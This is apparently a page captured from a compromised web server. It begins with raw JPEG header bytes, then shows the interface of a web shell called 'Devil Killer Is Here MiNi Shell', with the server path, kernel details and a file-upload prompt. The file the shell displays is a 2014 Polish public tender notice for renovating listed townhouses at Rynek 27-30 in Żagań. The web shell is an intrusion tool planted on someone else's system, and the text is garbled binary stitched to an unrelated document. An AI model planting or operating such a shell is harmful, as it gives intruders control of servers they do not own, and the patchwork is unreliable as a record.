JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140320/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140320/59873-N-2014.html

<p class="kh_header"><b>Żagań: REWITALIZACJA STARÓWKI MIEJSKIEJ W ŻAGANIU - ETAP I. RYNEK 27-30</b><br>
<b>Numer ogłoszenia: 59873 - 2014; data zamieszczenia: 20.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Żagańskie Towarzystwo Budownictwa Społecznego Sp. z o.o. z Żaganiu , ul. Miodowa 23, 68-100 Żagań, woj. lubuskie, tel. 068 4782211, faks 068 4782211.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: towarzystwo budownictwa społecznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REWITALIZACJA STARÓWKI MIEJSKIEJ W ŻAGANIU - ETAP I. RYNEK 27-30.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty
budowlane dla budynku położonego przy ul. Rynek 27-30 w Żaganiu, na działce ewidencyjnej nr 1126/2, w
ramach Rewitalizacji Starówki Miejskiej w Żaganiu - etap I. Obiekty są częścią pierzei południowej ul. Rynek.
Jest to zespół budynków o funkcji usługowo-mieszkalnej, II kondygnacyjnych, podpiwniczonych, z poddaszem
użytkowym. Budynki wykonane w technologii tradycyjnej, ściany murowane z cegły pełnej, dach spadzisty
drewniany kryty dachówką ceramiczną. Obiekty są wpisane do rejestru zabytków pod numerem 70 oraz 1168,
1990, 2513, 2627, 2628. Parametry charakterystyczne budynków: Rynek 27 szerokość - 8,25 m, długość - 21,20
m, wysokość - 15,65 m, powierzchnia zabudowy - 174,90 m2, kubatura części nadziemnej - 2218,00 m3 Rynek
28 szerokość - 5,05 m, długość - 18,95 m, wysokość - 15,00 m, powierzchnia zabudowy - 95,70 m2, kubatura
części nadziemnej - 1193,00 m3 Rynek 29 szerokość - 7,35 m, długość - 18,95 m, wysokość - 13,00 m,
powierzchnia zabudowy - 139,30 m2, kubatura części nadziemnej - 1346,00 m3 Rynek 30 szerokość - 6,10 m,
długość - 19,55 m, wysokość - 11,00 m, powierzchnia zabudowy - 119,20 m2, kubatura części nadziemnej -
1073,00 m3 Rynek 30 szerokość - 5,10 m, długość - 19,55 m, wysokość - 10,50 m, powierzchnia zabudowy -
99,70 m2, kubatura części nadziemnej - 897,00 m3. 1. Zakres robót obejmuje wymianę obróbek blacharskich,
rynien i rur spustowych, docieplenie ścian północnej, wschodniej i zachodniej z tynkowaniem i kolorystyką,
montaż parapetów zewnętrznych, malowanie klatek schodowych, wymianę drzwi i okien na klatkach
schodowych. Uwaga: z zakresu robót wskazanych w projekcie budowlanym wyłączono naprawę więźby
dachowej (pkt. 3.1.1), wymianę pokrycia dachu (3.1.2) oraz remont kominów (3.1.3). 2. Budynek położony jest w
ścisłej strefie ochrony konserwatorskiej miasta, wpisanej do rejestru zabytków pod nr 70. 3. Roboty budowlane
należy wykonać zgodnie z dokumentacją projektową opracowaną przez PHU Biuro Projektowe PROBUD wraz z
załączonymi do niej decyzjami o pozwoleniu na roboty budowlane, uzupełnieniami, uwagami do zakresu robót
oraz decyzjami właściwego dla nieruchomości konserwatora zabytków. 4. Roboty wykonywane na obiektach
wpisanych do rejestru zabytków oraz znajdujących się w strefie ochrony konserwatorskiej prowadzone są pod
nadzorem właściwego dla nieruchomości konserwatora zabytków. 5. Podczas realizacji przedmiotu zamówienia
(wykonywania prac) Wykonawca zobowiązany jest stosować fabrycznie nowe materiały i wyroby. Wszelkie
stosowane technologie, materiały i wyroby muszą być dopuszczone do obrotu i stosowania w budownictwie, jak
również posiadać aktualne aprobaty i świadectwa dopuszczenia, zgodnie z ustawą z dnia 16 kwietnia 2004r. o
wyrobach budowlanych (Dz.U. 2004, Nr 92, poz. 881 ze zm.) wraz z aktami wykonawczymi. 6. Szczegółowy
zakres prac określony został w dokumentacji technicznej, załączonej do niniejszej specyfikacji, w szczególności
zawierającej: 1) Projekt budowlany, 2) Informację BIOZ, 3) Specyfikację techniczną, 4) Przedmiar robót, 5)
Postanowienie Miejskiego Konserwatora Zabytków z 20.02.2014r. 6) Pozwolenie na budowę 7. Ponadto
Wykonawca zobowiązany będzie, w szczególności do: 1) uczestniczenia na wezwanie Zamawiającego w
spotkaniach w celu omówienia spraw związanych z realizacją prac; 2) utrzymywania miejsca wykonywanych
prac w stanie wolnym od zbędnych przeszkód; 3) gromadzenia, zabezpieczenia i usuwania na bieżąco
zbędnych materiałów, wszelkich odpadów, śmieci i opakowań oraz innych pozostałości; 4) zorganizowania oraz
należytego zabezpieczenia miejsca realizacji przedmiotu zamówienia w sposób zapewniający bezpieczeństwo
osób przebywających na terenie obiektu i w jego obrębie, w tym ogrodzenia terenu robót oraz jego
zabezpieczenia przed dostępem osób postronnych; 5) skoordynowania wszelkich działań związanych z
realizacją przedmiotu zamówienia; 6) zapewnienia osoby: -posiadającej uprawnienia budowlane do kierowania
robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń (kierownika budowy) z
doświadczeniem w pełnieniu funkcji kierownika budowy lub kierownika robót na co najmniej dwóch zadaniach
obejmujących wykonanie robót dociepleniowych i elewacyjnych, należącej do izby samorządu zawodowego oraz
posiadającej odpowiednie kwalifikacje, o których mowa w §24 rozporządzenia Ministra Kultury i Dziedzictwa
Narodowego z dn. 27 lipca 2011r. w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót
budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do
rejestru zabytków oraz badań archeologicznych (Dz.U. nr 165, poz. 987), czyli posiadającej co najmniej 2-letnią
praktykę zawodową na budowie przy zabytkach nieruchomych wpisanych do rejestru zabytków. -osoby, która
będzie pełnić funkcję inspektora konserwatorskiego nadzoru technologicznego, posiadającej uprawnienia
określone przepisem §22 rozporządzenia MKiDN z 27 lipca 2011r. (cyt. wyżej), tzn. osoby, która posiada tytuł
zawodowy magistra uzyskany po ukończeniu studiów wyższych na kierunku konserwacja i restauracja dzieł
sztuki lub w specjalności w zakresie konserwacji zabytków oraz odbyła po ukończeniu tych studiów co najmniej
12-miesięczną praktykę zawodową w zakresie konserwacji lub badania zabytków wpisanych do rejestru
zabytków lub osoby, która posiada: świadectwo ukończenia szkoły średniej zawodowej oraz tytuł zawodowy albo
wykształcenie średnie i dyplom potwierdzający posiadanie kwalifikacji zawodowych w zawodach
odpowiadających danej dziedzinie lub dyplom mistrza w zawodzie odpowiadającym danej dziedzinie oraz odbyła
co najmniej 5-letnią praktykę zawodową w zakresie konserwacji lub badania zabytków wpisanych do rejestru
zabytków, zgodnie z postanowieniem Miejskiego Konserwatora Zabytków z 20.02.2014r..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.32.10.00-3, 45.44.30.00-4, 45.45.30.00-7, 45.40.00.00-1, 45.44.21.00-8, 45.42.11.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie.
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na
podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich 5 lat przed
upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie,
wykonał co najmniej dwie roboty budowlane odpowiadające swoim zakresem i wartością zamówienia
będącego przedmiotem postępowania tj. dwie roboty budowlane obejmujące swym zakresem roboty
dociepleniowe i elewacyjne</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia warunku
nastąpi na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy PZP</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje: -osobą, która
będzie pełnić funkcję kierownika budowy, posiadającą uprawnienia budowlane do kierowania robotami
budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń, z doświadczeniem w
pełnieniu funkcji kierownika budowy lub kierownika robót na co najmniej dwóch zadaniach
obejmujących swym zakresem roboty dociepleniowe i elewacyjne, należy do izby samorządu
zawodowego oraz posiada odpowiednie kwalifikacje, o których mowa w §24 Rozporządzenia Ministra
Kultury i Dziedzictwa Narodowego z dn. 27 lipca 2011r. w sprawie prowadzenia prac
konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań
architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań
archeologicznych (Dz.U. nr 165, poz. 987), czyli odbyły co najmniej 2-letnią praktykę zawodową na
budowie przy zabytkach nieruchomych wpisanych do rejestru zabytków; -osobą, która będzie pełnić
funkcję inspektora konserwatorskiego nadzoru technologicznego, posiadającą uprawnienia określone
przepisem §22 rozporządzenia MKiDN z 27 lipca 2011r. (cyt. wyżej), tzn. osobą, która posiada tytuł
zawodowy magistra uzyskany po ukończeniu studiów wyższych na kierunku konserwacja i restauracja
dzieł sztuki lub w specjalności w zakresie konserwacji zabytków oraz odbyła po ukończeniu tych
studiów co najmniej 12-miesięczną praktykę zawodową w zakresie konserwacji lub badania zabytków
wpisanych do rejestru zabytków lub osobą, która posiada: świadectwo ukończenia szkoły średniej
zawodowej oraz tytuł zawodowy albo wykształcenie średnie i dyplom potwierdzający posiadanie
kwalifikacji zawodowych w zawodach odpowiadających danej dziedzinie lub dyplom mistrza w
zawodzie odpowiadającym danej dziedzinie oraz odbyła co najmniej 5-letnia praktykę zawodową w
zakresie konserwacji lub badania zabytków wpisanych do rejestru zabytków, zgodnie z
postanowieniem Miejskiego Konserwatora Zabytków z 20.02.2014r.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniającego te wymogi tego Wykonawcę, który ubezpieczony jest od
odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z
przedmiotem zamówienia na kwotę w wysokości nie mniejszej niż 200.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Dwie roboty budowlane obejmujące swym zakresem roboty dociepleniowe i elewacyjne.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony załącznik nr 1 - formularz OFERTA 2.Pełnomocnictwo, o ile umocowanie prawne do reprezentacji
wykonawcy nie wynika z przepisów prawa lub dokumentów rejestrowych załączonych do oferty. Pełnomocnictwo
należy złożyć w oryginale lub notarialnie poświadczonej kopii. 3.Zobowiązania innych podmiotów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający na podstawie art. 144 ust.1 i 2 ustawy Prawo zamówień publicznych dopuszcza możliwość zmian
postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy,
pod następującymi warunkami: 1) Zamawiający dopuszcza możliwość dokonania istotnych zmian umowy w
przypadku: a) działania siły wyższej mającej bezpośredni wpływ na realizację przedmiotu umowy, b) zmiany
przepisów prawa powszechnie obowiązującego pozostających w bezpośrednim związku z przedmiotem umowy i
mających na ten przedmiot wpływ, z zastrzeżeniem, że w przypadku wzrostu stawki podatku VAT cena brutto
wskazana w umowie nie ulegnie zmianie. W takiej sytuacji Wykonawca zobowiązany jest do wystawienia faktury
zgodnie z cenami brutto podanymi w ofercie, c) zmiany na rozwiązania korzystniejsze dla Zamawiającego, a
ponadto: 2) w zakresie wydłużenia terminu obowiązywania umowy, pod warunkiem, że: a) zachodzi konieczność
wykonania robót dodatkowych na zadaniu o wykonanie robót budowlanych, których wykonanie w sposób
obiektywny uniemożliwia terminowe zakończenie realizacji przedmiotu zamówienia; b) prace objęte umową o
wykonanie robót budowlanych zostały wstrzymane przez właściwe organy z przyczyn niezależnych od
Wykonawcy; c) wystąpiły wyjątkowo niesprzyjające warunki atmosferyczne, które ze względów obiektywnych uniemożliwiają wykonanie robót budowlanych zgodnie z normami techniczno-budowlanymi, co uniemożliwia
terminowe zakończenie realizacji przedmiotu zamówienia. Przy czym na wykonawcy ciąży obowiązek
wykazania, iż okoliczności takie zaszły faktycznie i są jedynym powodem wydłużenia terminu realizacji; d)
zachodzi konieczność uzyskania niemożliwych do przewidzenia na etapie planowania inwestycji o wykonanie
robót budowlanych zgody osób trzecich lub właściwych organów; e) w trakcie robót nastąpiły okoliczności
wymagające wyjaśnień lub uzgodnień z projektantem i wymagające wstrzymania robót, przy czym na
Wykonawcy ciąży obowiązek wykazania, iż okoliczności takie zaszły faktycznie i są jedynym powodem
wydłużenia terminu realizacji. 3) w zakresie zmniejszenia zakresu robót pod warunkiem, że: z niemożliwych do
przewidzenia na etapie planowania inwestycji o roboty budowlane przyczyn, wykonanie całości przedmiotu
zamówienia napotyka na istotne trudności; 4) w zakresie zmiany kierownika budowy przedstawionym w ofercie
jedynie za uprzednią pisemną zgodą Zamawiającego, akceptując nowego kierownika budowy, w przypadku, gdy:
a) Wykonawca z własnej inicjatywy proponuje zmianę kierownika budowy w następujących przypadkach:
-choroby lub innych zdarzeń losowych dotyczących kierownika, -nie wywiązywania się kierownika budowy z
obowiązków wynikających z Umowy zawartej w ramach przedmiotowego zamówienia, -jeżeli zmiana kierownika
budowy stanie się konieczną z jakichkolwiek przyczyn niezależnych od Wykonawcy (np. rezygnacji), b)
Zamawiający może zażądać od Wykonawcy zmiany kierownika budowy, jeżeli uzna, że nie wykonuje on swoich
obowiązków wynikających z Umowy zawartej w ramach przedmiotowego zamówienia bądź unika kontaktu z
inwestorem; Wykonawca zobowiązany jest zmienić kierownika budowy lub kierowników robót branżowych
zgodnie z żądaniem Zamawiającego we wskazanym przez Zamawiającego terminie. c) W przypadku zmiany
kierownika budowy, nowy kierownik budowy musi spełniać wymagania określone w Ogłoszeniu o zamówieniu
dla powyższych osób. 5) w zakresie zmiany formy zabezpieczenia umowy: zmiana przewidziana w art.149 ust.1
ustawy Prawo Zamówień Publicznych (T.j. Z 2013r., Dz. U. poz. 907, z późn. zm.). 6) w zakresie zmiany
podwykonawców: a) w przypadku wprowadzenia podwykonawcy, wprowadzenia nowego (kolejnego)
podwykonawcy, rezygnacji podwykonawcy, zmiany wartości lub zakresu robót wykonywanych przez
podwykonawcę, Zamawiający może wyrazić zgodę na powyższe po zaakceptowaniu umowy Wykonawcy z
podwykonawcą wraz z częścią dokumentacji dotyczącej wykonania robót określonych w umowie, w terminie 14
dni od przekazania umowy przez Wykonawcę. Brak zachowania terminu przez Zamawiającego jest
jednoznaczny z brakiem akceptacji umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zagantbs.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Żagańskie Towarzystwo
Budownictwa Społecznego Sp. z o.o. w Żaganiu, ul. Miodowa 23, 68-100 Żagań, pok. nr 22.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.04.2014 godzina 10:00, miejsce: Żagańskie Towarzystwo
Budownictwa Społecznego Sp. z o.o. w Żaganiu, ul. Miodowa 23, 68-100 Żagań, pok. nr 22 (II piętro, sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Niniejszy przetarg Zamawiający, jako Lider Projektu pt. Rewitalizacja Starówki Miejskiej w
Żaganiu - etap I, ogłasza na rzecz i w imieniu Inwestora Partnera Projektu - Wspólnoty Mieszkaniowej Rynek
27-30 w Żaganiu. Projekt jest współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu
Rozwoju Regionalnego oraz budżetu państwa w ramach Lubuskiego Regionalnego Programu Operacyjnego na
lata 2007-2013. Priorytet IV. Rozwój i modernizacja infrastruktury społecznej. Działanie 4.3. Rewitalizacja
zdegradowanych obszarów miejskich i wiejskich..</p>
